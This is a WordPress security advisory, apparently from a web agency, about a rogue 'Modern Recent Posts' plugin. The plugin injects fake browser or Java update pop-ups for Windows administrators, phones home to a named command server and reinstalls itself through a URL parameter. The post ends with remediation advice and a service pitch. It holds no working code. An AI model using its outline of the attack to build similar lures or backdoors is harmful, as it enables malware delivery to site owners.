A new social-engineering campaign is abusing a malicious WordPress plugin to show convincing fake browser or Java update pop-ups — but only to administrators inside wp-admin. The goal is to trick site owners into downloading malware to their own computers, while the plugin quietly maintains access to the website. Here’s what’s happening and how to protect your business.

What’s going on

Attackers are installing a rogue plugin masquerading as a harmless widget (seen as “Modern Recent Posts”). Once active, it fetches remote JavaScript from attacker-controlled servers and injects it into the WordPress dashboard for logged-in admins. The pop-up blocks the screen and pushes an “Update now” download from a malicious domain.

How the attack works (plain English)

• Administrator-only targeting: The plugin checks that you’re in wp-admin, have administrator permissions, and are on Windows — then it runs.
• Remote control: It contacts a command server (persistancejs.store), sends basic details (site hostname, admin username), and loads a Base64-encoded script into your browser session.
• Deceptive pop-up: The injected script displays a full-screen “critical update” for Chrome/Firefox/Java. Clicking “UPDATE NOW” triggers a download from a look-alike domain (e.g. secure-java-update.com).
• Self-update & cleanup: A special URL parameter (?upd=1) lets attackers delete the plugin’s files and pull a fresh copy from the command server — helping the malware persist or change tactics.

Why this matters to your business

• Compromised devices: One click can install a remote-access trojan, ransomware or info-stealer on the administrator’s laptop — jeopardising email, cloud drives and other client sites.
• Ongoing website risk: With a backdoor in place, attackers can add more malware, create rogue users or inject ads — damaging trust, SEO and conversions.
• Cost & disruption: Incident response, lost productivity and reputational harm quickly outweigh the effort of preventative controls.

Warning signs

• Unexpected “Modern Recent Posts” (or other unfamiliar) plugins installed without your knowledge.
• Pop-ups in the WordPress dashboard urging a Chrome/Firefox/Java update.
• Outgoing connections to unknown domains such as persistancejs.store.
• Admin sessions behaving oddly or sudden file changes in plugins/themes.

Quick response (do this now)

1. Protect the site with a WAF: Put a web application firewall in front of WordPress to block malicious requests while you investigate.
2. Remove the rogue plugin: In SFTP/SSH, delete the suspicious plugin directory; then remove it from the dashboard. Keep a copy for forensics.
3. Scan thoroughly: Run server-side malware scans to detect injected JavaScript and backdoors. Follow with professional malware removal if needed.
4. If anyone clicked “Update”: Treat the administrator’s computer as compromised. Run a full endpoint antivirus/malware scan and change passwords from a clean device.
5. Rotate credentials: Update WordPress, hosting, SFTP/SSH and database passwords; regenerate security keys; enforce 2FA for all admins.
6. Audit logs & egress: Review admin activity and block suspicious domains at the firewall.
7. Update everything: Apply current WordPress core, plugin and theme updates as part of ongoing website maintenance.

Prevention and ongoing protection

• Least-privilege access: Minimise the number of administrators; enforce strong, unique passwords and 2FA.
• Security monitoring: Enable file-integrity alerts and behavioural security monitoring to spot new plugins, file changes and unusual admin activity.
• WAF in front of WordPress: A reputable WAF adds virtual patching and helps stop malicious uploads and call-outs — strengthening your malware protection.
• Backups & recovery: Maintain regular, off-site backups for rapid restoration after malware removal.
• Plugin hygiene: Use reputable sources only; remove anything unused.

How matm can help

• Managed WordPress, plugin & theme updates
• Security monitoring and WAF setup
• Regular backups & fast site recovery
• Malware removal and emergency response

Need calm, practical support to remove infections and strengthen your WordPress security? Email [email protected] or call 01952 883 526.

Based on research by Sucuri — read the original analysis.